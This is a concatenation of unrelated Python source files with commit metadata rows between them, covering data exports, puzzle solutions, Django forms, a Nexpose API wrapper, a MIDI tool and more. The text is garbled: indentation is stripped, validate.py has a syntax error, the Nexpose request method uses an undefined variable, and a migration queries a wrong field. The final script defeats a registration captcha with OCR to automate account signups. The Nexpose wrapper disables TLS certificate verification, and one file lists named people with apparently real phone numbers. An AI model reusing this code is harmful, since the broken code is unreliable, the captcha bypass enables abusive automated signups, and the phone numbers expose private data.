'''
python scripts/data_download/higher_education/create_files.py en scripts/data/higher_education/en/ 2009
'''
from collections import namedtuple
from datetime import datetime
import pandas as pd
import os
import bz2
import sys
import logging
import imp
def local_imports():
global common, dictionary
f, filename, desc = imp.find_module('common', ['./scripts/data_download/'])
common = imp.load_module('common', f, filename, desc)
f, filename, desc = imp.find_module('dictionary', ['./scripts/data_download/'])
dictionary = imp.load_module('common', f, filename, desc)
def select_table(conditions):
s = 'y'
# 0 year, 1 location, 3 major
if conditions[1] != ' 1 = 1 ':
s += 'b'
if conditions[1] == ' 1 = 1 ' and conditions[2] == ' 1 = 1 ':
s += 'b'
if conditions[2] != ' 1 = 1 ':
s += 'c'
return 'hedu_' + s
def save(year, locations, majors, lang, output_path):
conditions = [' 1 = 1', ' 1 = 1', ' 1 = 1'] # 5 condicoes
table_columns = {}
columns_deleted=['bra_id_len', 'course_hedu_id_len', 'enrolled_rca']
if lang == 'en':
dic_lang = dictionary.en
else:
dic_lang = dictionary.pt
conditions[0] = year.condition
for location in locations:
conditions[1] = location.condition
for major in majors:
conditions[2] = major.condition
if location.condition == ' 1 = 1 ' and major.condition == ' 1 = 1 ':
continue;
table = select_table(conditions)
name_file = 'hedu'+str(year.name)+str(location.name)+str(major.name)
new_file_path = os.path.join(output_path, name_file+".csv.bz2")
if table not in table_columns.keys():
table_columns[table] = [ i+" as '"+dic_lang[i]+"'" for i in common.get_colums(table, columns_deleted)]
query = 'SELECT '+','.join(table_columns[table])+' FROM '+table+' WHERE '+' and '.join(conditions) + ' LIMIT 5'
logging.info('Query for file ('+str(datetime.now().hour)+':'+str(datetime.now().minute)+':'+str(datetime.now().second)+'): \n '+name_file+'\n'+query)
print "Gerando ... " + new_file_path
f = pd.read_sql_query(query, common.engine)
f.to_csv(bz2.BZ2File(new_file_path, 'wb'), sep=",", index=False, float_format="%.3f", encoding='utf-8')
logging.info("\nError:\n"+str(sys.stderr)+"\n-----------------------------------------------\n")
Condition = namedtuple('Condition', ['condition', 'name'])
locations = [
Condition(' 1 = 1 ', ''),
Condition('bra_id_len=1', '-regions'),
Condition('bra_id_len=3', '-states'),
Condition('bra_id_len=5', '-mesoregions'),
Condition('bra_id_len=7', '-microregions'),
Condition('bra_id_len=9', '-municipalities')]
majors = [
Condition(' 1 = 1 ', ''),
Condition('course_hedu_id_len=2', '-field'),
Condition('course_hedu_id_len=6', '-majors')]
if len(sys.argv) != 4 or (sys.argv[1:][0] not in ['pt', 'en']):
print "ERROR! use :\npython scripts/data_download/higher_education/create_files.py en/pt output_path year"
exit()
output_path = os.path.abspath(sys.argv[2])
logging.basicConfig(filename=os.path.abspath(os.path.join(sys.argv[2],'higher-education-data-download.log' )),level=logging.DEBUG)
year = Condition('year='+str(sys.argv[3]), '-'+str(sys.argv[3]))
local_imports()
save(year=year, locations=locations, majors=majors, lang=sys.argv[1], output_path=output_path)
| Python | 0 | |
3de2e625af9047b64cc2718e6e79be0c428b6ae7 | Solve Code Fights extract each kth problem | CodeFights/extractEachKth.py | CodeFights/extractEachKth.py | #!/usr/local/bin/python
# Code Fights Extract Each Kth Problem
def extractEachKth(inputArray, k):
return [e for i, e in enumerate(inputArray) if (i + 1) % k != 0]
def main():
tests = [
[[1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3, [1, 2, 4, 5, 7, 8, 10]],
[[1, 1, 1, 1, 1], 1, []],
[[1, 2, 1, 2, 1, 2, 1, 2], 2, [1, 1, 1, 1]]
]
for t in tests:
res = extractEachKth(t[0], t[1])
ans = t[2]
if ans == res:
print("PASSED: extractEachKth({}, {}) returned {}"
.format(t[0], t[1], res))
else:
print(("FAILED: extractEachKth({}, {}) returned {},"
"answer: {}").format(t[0], t[1], res, ans))
if __name__ == '__main__':
main()
| Python | 0.000853 | |
0f1f96ce23ab89c8de3cf24645c4ea77fa2a9196 | add first test with random data | test_window.py | test_window.py | from telescope import LST
from windows import TelescopeEventView
import tkinter as tk
import numpy as np
lst = LST(0, 0, 0)
root = tk.Tk()
viewer1 = TelescopeEventView(root, lst, np.random.normal(size=lst.n_pixel))
viewer2 = TelescopeEventView(root, lst, np.random.normal(size=lst.n_pixel))
viewer1.pack(side=tk.LEFT, expand=True, fill=tk.BOTH)
viewer2.pack(side=tk.LEFT, expand=True, fill=tk.BOTH)
root.mainloop()
| Python | 0.000001 | |
60b5948508a67cb213ca04b5faacb77e27d8f84c | Add fields expicitly declared in form | samples/forms.py | samples/forms.py | import datetime #for checking renewal date range.
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from .models import (Patient, AdmissionNote, FluVaccine,
CollectionType, CollectedSample,
Symptom, ObservedSymptom,
)
from fiocruz.settings.base import DATE_INPUT_FORMATS
class AdmissionNoteForm(forms.ModelForm):
class Meta:
model = AdmissionNote
fields = [
'id_gal_origin',
]
class PatientForm(forms.ModelForm):
class Meta:
model = Patient
fields = [
'name',
]
class FluVaccineForm(forms.ModelForm):
date_applied = forms.DateField(input_formats=DATE_INPUT_FORMATS)
class Meta:
model = FluVaccine
fields = ['was_applied', 'date_applied', ]
| import datetime #for checking renewal date range.
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from .models import (Patient, AdmissionNote, FluVaccine,
CollectionType, CollectedSample,
Symptom, ObservedSymptom,
)
from fiocruz.settings.base import DATE_INPUT_FORMATS
class AdmissionNoteForm(forms.ModelForm):
class Meta:
model = AdmissionNote
fields = [
'id_gal_origin',
]
class PatientForm(forms.ModelForm):
class Meta:
model = Patient
fields = [
'name',
]
class FluVaccineForm(forms.ModelForm):
date_applied = forms.DateField(input_formats=DATE_INPUT_FORMATS)
class Meta:
model = FluVaccine
exclude = ['admission_note', ]
| Python | 0 |
5ca9e468b9709ae2c7358551a19e668e580ea396 | add deserialized json object validation functions | src/validate.py | src/validate.py | from collections import Counter
modeltypes = set(["asymmetric_beta_bernoulli", "normal_inverse_gamma", "pitmanyor_atom", "symmetric_dirichlet_discrete", "poisson_gamma"])])
def assert_map_consistency(map_1, map_2):
assert(len(map_1)==len(map_2))
for key in map_1:
assert(key == map_2[map_1[key]])
def assert_mc_consistency(mc):
assert_map_consistency(mc["name_to_idx"], mc["idx_to_name"])
assert(len(mc["name_to_idx"])==len(mc["column_metadata"]))
for column_metadata_i in column_metadata:
assert(column_metadata_i["modeltype"] in modeltypes)
assert_map_consistency(column_metadata_i["value_to_code"],
column_metadata_i["code_to_value"])
def assert_mr_consistency(mr):
assert_map_consistency(mr["name_to_idx"], mr["idx_to_name"])
| Python | 0 | |
827828dc479f295e6051d69c919f5f1c97dcb6e2 | Add management command to verify MOTECH connection certificates. | corehq/motech/management/commands/verify_motech_connection_certs.py | corehq/motech/management/commands/verify_motech_connection_certs.py | from urllib.parse import urlparse, urlunparse
import requests
from django.core.management.base import BaseCommand
from requests.exceptions import SSLError
from corehq.motech.models import ConnectionSettings
from corehq.util.log import with_progress_bar
IMPLICIT_HTTPS_PORT = 443
class Command(BaseCommand):
help = "Verify MOTECH connection certificates by performing an HTTP HEAD " \
"request to all unique domains where the URL method == HTTPS and " \
"SSL validation is enabled."
def add_arguments(self, parser):
parser.add_argument("-c", "--ca-bundle", metavar="FILE",
help="Use a custom CA trust store for SSL verifications.")
parser.add_argument("--connect-timeout", metavar="SECONDS", type=float,
default=None, help="Use custom HTTP connection timeout value.")
def handle(self, *args, **options):
verbose = options["verbosity"] > 1
timeout = options["connect_timeout"]
castore = options["ca_bundle"]
def debug(msg):
if verbose:
self.stdout.write(msg)
netlocs = {}
for connection in ConnectionSettings.objects.all():
if connection.skip_cert_verify:
debug(f"skipping (verify disabled): {connection.url}")
continue
urlparts = urlparse(connection.url)
if urlparts.scheme == "https":
hostname, x, port = urlparts.netloc.partition(":")
if not port:
# Key URL dict by explicit port numbers to avoid duplicate
# hits on domains where multiple URLs exist, some with the
# port implied and others with port 443 set explicitly.
port = IMPLICIT_HTTPS_PORT
root_url = urlunparse(("https", urlparts.netloc, "/", "", "", ""))
netlocs.setdefault((hostname, int(port)), root_url)
elif urlparts.scheme == "http":
debug(f"skipping (non-SSL): {connection.url}")
else:
debug(f"skipping (unknown scheme): {connection.url}")
errors = []
failures = []
urls = [v for (k, v) in sorted(netlocs.items())]
for url in with_progress_bar(urls, oneline=(not verbose)):
try:
debug(f"HEAD {url}")
requests.head(url, verify=(castore or True), timeout=timeout)
except SSLError:
failures.append(url)
except requests.RequestException as exc:
errors.append((url, str(exc)))
if errors:
self.stdout.write(f"{len(errors)} HTTP error(s):")
for url, msg in errors:
self.stderr.write(f"WARNING: {url} {msg}", self.style.NOTICE)
if failures:
self.stdout.write(f"{len(failures)} SSL verification failure(s):")
for url in failures:
self.stdout.write(f"FAIL: {url}", self.style.ERROR)
total = len(urls)
successes = total - (len(failures) + len(errors))
final_msg = f"\nSuccessfully verified {successes} of {total} domain(s)"
if total and not successes:
style = self.style.ERROR
elif total > successes:
style = self.style.WARNING
else:
style = self.style.SUCCESS
self.stdout.write(final_msg, style)
| Python | 0 | |
fc017a578a402b3d24523d1a41b7a4fdc0b107ef | add a starter proxy script | scripts/proxy.py | scripts/proxy.py | #!/usr/bin/env python
'''
Copyright (C) Kalan MacRow, 2013
This code is distributed with jquery.instagram.js
under the MIT license.
https://github.com/kmacrow/jquery.instagram.js
'''
import os
import cgi
import sys
import cgitb
import urllib2
# Base URL for Instagram API endpoints
INSTAGRAM_BASE = 'https://api.instagram.com/v1/'
# Add acceptable origins here...
ACCEPT_ORIGINS = ['http://localhost',
'http://localhost:8888',
'http://localhost:8080']
# Initialize CGI with JSON output
cgitb.enable()
form = cgi.FieldStorage()
print "Content-Type: application/json"
# Support cross origin resource sharing
origin = os.environ.get('HTTP_ORIGIN')
if origin in ACCEPT_ORIGINS:
print "Access-Control-Allow-Origin: %s" % origin
# empty line after headers
print
client_id = form.getfirst('client_id', None)
tag_name = form.getfirst('tag', None)
if not client_id or not tag_name:
print '{"error":"client_id and tag required."}'
sys.exit(0)
# Get the data from Instagram
stream = urllib2.urlopen(INSTAGRAM_BASE + 'tags/' + tag_name \
+ '/media/recent/?client_id=' + client_id)
print stream.read()
| Python | 0 | |
a319f2f1606a5c4d33e846b496e555140607c98d | Add track_name script | track_names.py | track_names.py | import midi
import sys
def track_name(track):
for ev in track:
if isinstance(ev, midi.TrackNameEvent):
return ''.join(map(chr, ev.data))
name = 'no name, first 6 events:'
for ev in track[:6]:
name += '\n %s' % ev
return name
def main(argv):
if len(argv) < 2:
print 'usage: track_names.py file.mid'
return
mid = midi.read_midifile(argv[1])
print '%d tracks' % len(mid)
for i, t in enumerate(mid):
print ' %03d: %s' % (i, track_name(t))
if __name__ == '__main__':
main(sys.argv)
| Python | 0.000002 | |
877a7b7449a1d88c14633376a2dfaca8c619c26a | Add solution to exercis 3.6. | exercises/chapter_03/exercise_03_06/exercise_03_06.py | exercises/chapter_03/exercise_03_06/exercise_03_06.py | # 3-6 Guest List
guest_list = ["Albert Einstein", "Isac Newton", "Marie Curie", "Galileo Galilei"]
message = "Hi " + guest_list[0] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[1] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[2] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[3] + " you are invited to dinner at 7 on saturday."
print(message)
cancelation_message = guest_list[1] + " can not attend the dinner."
print(cancelation_message)
guest_list[1] = "Charles Darwin"
message = "Hi " + guest_list[0] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[1] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[2] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[3] + " you are invited to dinner at 7 on saturday."
print(message)
message = "I have a bigger table now so three more people will be invited."
print(message)
guest_list.insert(0, "Stephen Hawking")
guest_list.insert(2, "Louis Pasteur")
guest_list.append("Nicolaus Copernicus")
message = "Hi " + guest_list[0] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[1] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[2] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[3] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[4] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[5] + " you are invited to dinner at 7 on saturday."
print(message)
message = "Hi " + guest_list[6] + " you are invited to dinner at 7 on saturday."
print(message)
| Python | 0 | |
5c7538ca1e43eb4529c04169a9a15c513bc3e659 | Add segment_tangent_angle tests module | tests/plantcv/morphology/test_segment_tangent_angle.py | tests/plantcv/morphology/test_segment_tangent_angle.py | import pytest
import cv2
from plantcv.plantcv import outputs
from plantcv.plantcv.morphology import segment_tangent_angle
@pytest.mark.parametrize("size", [3, 100])
def test_segment_tangent_angle(size, morphology_test_data):
# Clear previous outputs
outputs.clear()
skel = cv2.imread(morphology_test_data.skel_img, -1)
leaf_obj = morphology_test_data.load_segments(morphology_test_data.segments_file, "leaves")
_ = segment_tangent_angle(segmented_img=skel, objects=leaf_obj, size=size)
assert len(outputs.observations['default']['segment_tangent_angle']['value']) == 4
| Python | 0.000001 | |
6d2d224d246569a35a7b4ae5d8086e83bbb67155 | move server.py to project dir | server/server.py | server/server.py | from datetime import datetime
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
SERVER_PORT = 90
HOST_ADDRESS = ''
def save_data(user_email):
file = open('users.txt', 'a+')
current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
file.write("{}, {}".format(user_email, current_time))
file.write("\n")
print("save {}".format(user_email))
def get_json(data):
try:
return json.loads(data)
except ValueError:
# if user send not json --> ignore all that he sent
return []
class S(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def do_GET(self):
self._set_headers()
self.wfile.write("{\"hello\":\"friend\"}".encode("utf-8"))
def do_HEAD(self):
self._set_headers()
def do_POST(self):
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data_str = self.rfile.read(content_length).decode()
post_data_json = get_json(post_data_str)
email_key = "email"
# if client didn't send email as param
user_email = post_data_json[email_key] if email_key in post_data_json else None
self._set_headers()
if user_email is not None:
save_data(user_email)
self.wfile.write("{\"successfully\":\"registered\"}".encode("utf-8"))
else:
self.wfile.write("{\"error\":\"invalid request\"}".encode("utf-8"))
def run(server_class=HTTPServer, handler_class=S, port=SERVER_PORT):
server_address = (HOST_ADDRESS, port)
httpd = server_class(server_address, handler_class)
print('Starting httpd...')
httpd.serve_forever()
run()
| Python | 0 | |
a8db8c0448d98e2de0e662581542bd644e673c7c | Add migration removing generated objects with factories | geotrek/core/migrations/0018_remove_other_objects_from_factories.py | geotrek/core/migrations/0018_remove_other_objects_from_factories.py | # Generated by Django 2.0.13 on 2020-04-06 13:40
from django.conf import settings
from django.contrib.gis.geos import Point, LineString
from django.db import migrations
def remove_generated_objects_factories(apps, schema_editor):
ComfortModel = apps.get_model('core', 'Comfort')
PathSourceModel = apps.get_model('core', 'PathSource')
StakeModel = apps.get_model('core', 'Stake')
ComfortModel.objects.filter(paths__isnull=True, comfort__icontains="Comfort ").delete()
PathSourceModel.objects.filter(paths__isnull=True, comfort__icontains="PathSource ").delete()
StakeModel.objects.filter(paths__isnull=True, comfort__icontains="Stake ").delete()
class Migration(migrations.Migration):
dependencies = [
('core', '0017_remove_path_from_factories'),
]
operations = [
migrations.RunPython(remove_generated_objects_factories)
]
| Python | 0 | |
3ddf1f4a2bcae247978b66fd63848b3ed9782234 | add donwloader | MistDownloader.py | MistDownloader.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
import os
import time
import sys
import traceback
cnt=0
least_cnt=0
if len(sys.argv)==2:
least_cnt=int(sys.argv[1])
print least_cnt
if not os.path.exists("mp3"):
os.mkdir("mp3")
for path,dirname,filenames in os.walk("outdir"):
for filename in filenames:
if filename.startswith("mp3_url_"):
cnt+=1
if cnt%100==0:
print ("Has already downloaded %d songs!" % cnt)
f=open("outdir/"+filename)
for line in f:
values=line.split()
if len(values)!=3:
sys.stderr.write("Bad line '%s' in file %s\n" % (line,filename))
sid=values[0]
play_cnt=int(values[1])
url=values[2]
if play_cnt<least_cnt:
continue
fn="mp3/%s.mp3" % sid
if not os.path.exists(fn):
try:
urllib.urlretrieve(url, fn)
print(sid)
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,limit=None, file=sys.stderr)
time.sleep(2)
f.close()
| Python | 0.000014 | |
5f91091456931ed7e95e8aa05ad53134f5784f60 | Create summary_plot.py | summary_plot.py | summary_plot.py | ## script to plot the output
## from fermipy,given a .npy file
## Sara Buson, Oct. 2017
## very basic, need to implement better
## the reading of png, laoding the npy
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import sys
from matplotlib.cbook import get_sample_data
import matplotlib.image as mpimg
def getLCdata(lc,f_scale,ts=''):
if not ts>-10: ts=25
print ts
""" -- reading the LC output --- """
s=lc.split('/')
src=s[-1].split('_lightcurve.npy')[0]
o = np.load(lc).flat[0]
_ts = o['ts']
mjd=o['tmin_mjd']
mjd_width = mjd[1]-mjd[0]
mjd_middle=mjd+mjd_width
flux=o['flux']/f_scale
flux_err=o['flux_err']/f_scale
ul = o['flux100_ul95']/f_scale
#ul_er = 0. /f_scale
N_pred=o['npred']
bin_qual= o['fit_quality']
condition=_ts<ts #array of True/False
#x=np.where(condition) #array of positions where condition is True
y = [ (ul[i] if condition[i] else flux[i]) for i in xrange(len(mjd_middle)) ]
ye =[ (np.array(flux_err).mean() if condition[i] else flux_err[i]) for i in xrange(len(mjd_middle)) ]
npred=[ ( 0 if condition[i] else N_pred[i]) for i in xrange(len(mjd_middle)) ]
## need to implement the key in fermipy
#index = [ (0 if condition[i] else Ind[i]) for i in xrange(len(mjd_middle)) ]
#indexe =[ (0 if condition[i] else Inde[i]) for i in xrange(len(mjd_middle)) ]
return src,mjd_middle, mjd_width, flux, flux_err, ul, npred, bin_qual, condition
def plotLC(lc, ts='',f_scale=1e-8, where='./',save=False):
plt.rcParams['legend.handlelength'] = 2.4
plt.rcParams['legend.numpoints'] = 1
plt.rcParams['legend.handletextpad']=0.9
plt.rcParams['legend.markerscale']=0
#plt.rcParams['lines.linewidth']=0
left = 0.075 # the left side of the subplots of the figure
right = 0.975 # the right side of the subplots of the figure
bottom = 0.06 # the bottom of the subplots of the figure
top = 0.95 # the top of the subplots of the figure
wspace = 0.08 # the amount of width reserved for blank space between subplots
hspace = 0.3 # the amount of height reserved for white space between subplots
grid_size = (2, 3)
fig, axs = plt.subplots(nrows=2, ncols=3, sharex=False,figsize=(12,8))
""" FERMIPY LC """
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
""" -- reading the LC output in separete function --- """
f_scale_label=str(f_scale).split('-0')[-1]
ax0 =plt.subplot2grid(grid_size, (0, 0), rowspan=1, colspan=3) ## <<--------
ax0.set_ylabel('[$10^{-%s} ph cm^{-2} s^{-1}$]'%f_scale_label)
ax0.set_xlabel('Time [MJD]')
ax0.grid()
src,mjd_middle, mjd_width, flux, fluxerr, ul, N_pred,bin_qual, lolims = getLCdata(lc,f_scale,ts=ts)
plt.errorbar(mjd_middle,flux, xerr=mjd_width, yerr=fluxerr, uplims=lolims,
color='green',marker='o',markersize=4,ls='none',label='%s (%i-day binning; TS>%.1f)'%(src,mjd_width,ts))
## coming..
## to be included if the Sun is within the ROI
## plt. plot([timeSun0,timeSun0],[0,5], label='SUN',ls='dashed', c='red',linewidth=2.0)
leg0 = ax0.legend()
plt.legend(loc='upper left')
ax0.axes.get_xaxis().set_visible(True)
## HERE PLOT NPRED // QUALITY
ax1 =plt.subplot2grid(grid_size, (1, 0), rowspan=1, colspan=1) ## <<--------
ax1.set_ylabel('Flux/Flux_err')
ax1.set_xlabel('Npred/sqrt(Npred)')
#ax1.set_xlim(lt,rt)
#ax1.set_ylim(-0.01,3)
ax1.grid()
ratio_F_Fe= flux/fluxerr
ratio_Npred= N_pred/np.sqrt(N_pred)
plt.errorbar(ratio_Npred, ratio_F_Fe, xerr=0, yerr=0, uplims=False,
color='orange',marker='o',markersize=4,ls='none',label='')#,xnewF, F_(xnewF),'-',xnewF1, F_(xnewF1),'-',lw=2,label='LAT',color='green')#, xnew, f2(xnew), '--')
## coming..
## to be included if the Sun is within the ROI
## plt. plot([timeSun0,timeSun0],[0,5], label='SUN',ls='dashed', c='red',linewidth=2.0)
leg1 = ax1.legend()
plt.legend(loc='upper left')
ax1.axes.get_xaxis().set_visible(True)
## HERE PLOT TSMAP
what='pointsource_powerlaw_2.00_tsmap_sqrt_ts.png'
img=mpimg.imread(where+what)
newax = plt.subplot2grid(grid_size, (1, 1), rowspan=1, colspan=1)
imgplot = plt.imshow(img)
newax.imshow(img)
newax.axis('off')
## HERE PLOT SED
what='%s_sed.png'%src
img_sed = plt.imread(where+what)
newax = plt.subplot2grid(grid_size, (1, 2), rowspan=1, colspan=1)
imgplot = plt.imshow(img_sed)
newax.axis('off')
plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top,
wspace=wspace, hspace=hspace)
if save==True: plt.savefig('%s_summary.pdf'%src,transparent=True)
plt.show()
if __name__ == "__main__":
#try:
lcfile=sys.argv[1]
if sys.argv[2]: TS=float(sys.argv[2])
plotLC(lcfile,ts=TS,save=True)
#except: print 'usage:: python LC_file.npy ts'
| Python | 0.000067 | |
54e3d3147feb33f21c5bc78a8f3b4721574fcbb9 | Create A.py | Google-Code-Jam/2017-1B/A.py | Google-Code-Jam/2017-1B/A.py | import os
import sys
script = __file__
scriptPath = os.path.dirname(script)
scriptFile = os.path.basename(script)[0]
files = [f for f in os.listdir(scriptPath) if scriptFile in f and '.in' in f]
if '{}-large'.format(scriptFile) in str(files):
size = 'large'
elif '{}-small'.format(scriptFile) in str(files):
size = 'small'
elif '{}-test'.format(scriptFile) in str(files):
size = 'test'
else:
print('{}-test not found'.format(scriptFile))
sys.exit()
latest = sorted(f for f in files if size in f)[-1][:-3]
F = '{}/{}'.format(scriptPath, latest)
I = open(F + '.in', 'r')
O = open(F + '.out', 'w')
print(F)
T = int(I.readline()) # nb of test cases
# https://code.google.com/codejam/contest/8294486/dashboard
# Problem A.
for x in range(T):
D, N = map(int, I.readline().rstrip().split())
horses = [tuple(map(int, I.readline().split())) for _ in range(N)]
slowpoke = max((D-K)/S for K, S in horses)
y = D/slowpoke
result = '{}Case #{}: {}'.format('\n' if x else '', x + 1, y)
print(result)
O.write(result)
I.close()
O.close()
| Python | 0.000004 | |
607bd42a40b8f9909e3d889b6b9011b4d14a4e52 | add nexpose.py | nexpose.py | nexpose.py | #!/usr/bin/python3
import xml.etree.ElementTree as etree
import urllib.request
import urllib.parse
import sys
import ssl
__author__ = 'Nick Levesque <nick@portcanary.com>'
# Nexpose API wrapper.
class Nexpose:
def __init__(self, hostname, port):
self.hostname = hostname
self.port = port
self.url = 'https://%s:%s/api/1.2/xml' % (self.hostname, self.port)
self.session_id = None
# Often the Nexpose Console is run with a self-signed cert. We allow for that here.
self.ctx = ssl.create_default_context()
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
# Generic API request, feed it an xml string and off it goes.
def api_request(self, xml_string):
# Encode the xml so that urllib will accept it.
post_data = (xml_string).encode('utf-8')
# Prepare the request.
request = urllib.request.Request(url)
request.add_header("Content-type", "text/xml")
# Get a response.
response = urllib.request.urlopen(request, post_data, context=self.ctx).read()
xml_response = etree.fromstring(response)
# Check for errors and return response.
if not xml_response.tag == 'Failure':
return response
else:
for exception in xml_response.iter('Exception'):
for message in exception.iter('Message'):
return str("Failure: " + message.text)
# Login function, we must capture the session-id contained in the response if successful.
def login(self, username, password):
# Encode the login request string so that urllib will accept it.
xml_string = "<LoginRequest user-id=\"%s\" password=\"%s\" />" % (username, password)
post_data = (xml_string).encode('utf-8')
# Prepare the request
request = urllib.request.Request(self.url)
request.add_header("Content-type", "text/xml")
# Get a response
response = urllib.request.urlopen(request, post_data, context=self.ctx).read()
xml_response = etree.fromstring(response)
# Check for errors and set session-id.
if not xml_response.tag == 'Failure':
self.session_id = xml_response.attrib.get('session-id')
else:
for exception in xml_response.iter('Exception'):
for message in exception.iter('Message'):
return str("Failure: " + message.text)
def logout(self):
# Encode the logout request string so that urllib will accept it.
xml_string = "<LogoutRequest session-id=\"%s\" />" % (self.session_id)
post_data = (xml_string).encode('utf-8')
# Prepare the request.
request = urllib.request.Request(self.url)
request.add_header("Content-type", "text/xml")
# Get a response.
response = urllib.request.urlopen(request, post_data, context=self.ctx).read()
xml_response = etree.fromstring(response)
# Check for errors.
if not xml_response.tag == 'Failure':
pass
else:
for exception in xml_response.iter('Exception'):
for message in exception.iter('Message'):
return str("Failure: " + message.text)
if __name__ == '__main__':
# Usage: ./nexpose.py hostname port username password
nexpose = Nexpose(sys.argv[1], sys.argv[2])
result = nexpose.login(sys.argv[3], sys.argv[4])
if result:
print(result)
if nexpose.session_id:
print(nexpose.session_id)
nexpose.logout()
| Python | 0.000001 | |
a067c18f8534d79a85538eaf11e34e99f9e17286 | develop update to pair master, going to rename master now | oh_shit.py | oh_shit.py | from app import app, db
from app.mod_sms.models import *
ug1 = UserGroup(name='Canyon Time', phone='+17868378095', active=True)
ug2 = UserGroup(name='test', phone='+18503783607', active=True)
ryan = User(fname='Ryan', lname='Kuhl', phone='+13058985985', active=True)
simon = User(fname='Simon', lname='', phone='+13109264989', active=True)
dan = User(fname='Dan' , lname='Malik', phone='+14152718694', active=True)
tom = User(fname='Tom' , lname='Scorer', phone='+13109022760', active=True)
steve = User(fname='Steve', lname='Makuch', phone='+16164609893', active=True)
chris = User(fname='Chris', lname='', phone='+16269882527', active=True)
ben = User(fname='Ben' , lname='Eisenbise', phone='+13234017625', active=True)
alex = User(fname='Alex', lname='Thorpe', phone='+14243869550', active=True)
ug1.groups_to_users.append(ryan)
ug1.groups_to_users.append(simon)
ug1.groups_to_users.append(dan)
ug1.groups_to_users.append(tom)
ug1.groups_to_users.append(steve)
ug1.groups_to_users.append(chris)
ug1.groups_to_users.append(ben)
ug1.groups_to_users.append(alex)
ug2.groups_to_users.append(ryan)
db.session.add(ug1)
db.session.add(ug2)
db.session.add(ryan)
db.session.add(simon)
db.session.add(dan)
db.session.add(tom)
db.session.add(steve)
db.session.add(chris)
db.session.add(ben)
db.session.add(alex)
db.session.commit()
| Python | 0 | |
01c98087541828421da49295abedd3d894cdb3b5 | Create luz.py | opt/luz.py | opt/luz.py | #!/usr/bin/env python
# Realizado por: Roberto Arias (@bettocr)
#
# Permite encender y apagar luces leds
#
import RPi.GPIO as GPIO, time, os
GPIO.setmode(GPIO.BCM)
on = 0 # luces encendidas
MAX=5200 # luminocidad maxima antes de encender el led, entre mayor mas oscuro
PIN=23 # pin al relay
PINRC=24 #pin que lee la photocell
GPIO.setup(PIN,GPIO.OUT)
def RCtime (RCpin):
reading = 0
GPIO.setup(RCpin, GPIO.OUT)
GPIO.output(RCpin, GPIO.LOW)
time.sleep(0.1)
GPIO.setup(RCpin, GPIO.IN)
while (GPIO.input(RCpin) == GPIO.LOW):
reading += 1
return reading
while True:
#print RCtime(24)
luz = RCtime(PINRC)
if luz > MAX:
GPIO.output(PIN,True)
on = 1
if luz < MAX and on == 1:
GPIO.output(PIN,False)
on = 0
| Python | 0.000028 | |
87af377fab216e3db9ad700e124b356b15da492f | add form_register.py | 7.验证码处理/1.form_register.py | 7.验证码处理/1.form_register.py | #!/usr/bin/env python
# coding:utf-8
import csv
import string
import urllib
import urllib2
import cookielib
import lxml.html
import pytesseract
from PIL import Image
from io import BytesIO
REGISTER_URL = 'http://example.webscraping.com/places/default/user/register'
def parse_form(html):
"""从表单中找到所有的隐匿的input变量属性
"""
tree = lxml.html.fromstring(html)
data = {}
for e in tree.cssselect('form input'):
if e.get('name'):
data[e.get('name')] = e.get('value')
return data
def extract_image(html):
"""处理表单中嵌入的图片,解码之后保存img"""
tree = lxml.html.fromstring(html)
# 获取嵌入的图片数据
img_data = tree.cssselect('div#recaptcha img')[0].get('src')
# remove data:image/png;base64, header
img_data = img_data.partition(',')[-1]
# open('test_.png', 'wb').write(data.decode('base64'))
binary_img_data = img_data.decode('base64')
file_like = BytesIO(binary_img_data)
img = Image.open(file_like)
# img.save('test.png')
return img
def ocr(img):
"""使用开源的Tesseract OCR引擎对图片进行处理和识别
pytesseract.image_to_string(Image.open('xxx.png'))
"""
# 原始验证码图像 img = img.save('captcha_original.png')
# 处理阈值图像忽略背景和文本, 灰度处理
gray = img.convert('L')
# 转换之后的灰度图 gray.save('captcha_greyscale.png')
# 只有阀值小于1(全黑的颜色)的像素才能够保留下来
bw = gray.point(lambda x: 0 if x < 1 else 255, '1')
# 取阀值之后的图像 bw.save('captcha_threshold.png')
word = pytesseract.image_to_string(bw)
# 因为验证码重视小写, 我们进行消协处理, 增加识别率
ascii_word = ''.join(c for c in word if c in string.letters).lower()
return ascii_word
def register(first_name, last_name, email, password, captcha_fn):
"""实现自动注册
:param first_name: 注册填写的名字
:param last_name: 注册填写的姓氏
:param email: 注册填写的邮箱
:param password: 注册填写的密码
:param captcha_fn: 识别验证码的函数
:return: 是否登录成功
"""
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
html = opener.open(REGISTER_URL).read()
form = parse_form(html)
form['first_name'] = first_name
form['last_name'] = last_name
form['email'] = email
form['password'] = form['password_two'] = password
img = extract_image(html)
captcha = captcha_fn(img)
form['recaptcha_response_field'] = captcha
encoded_data = urllib.urlencode(form)
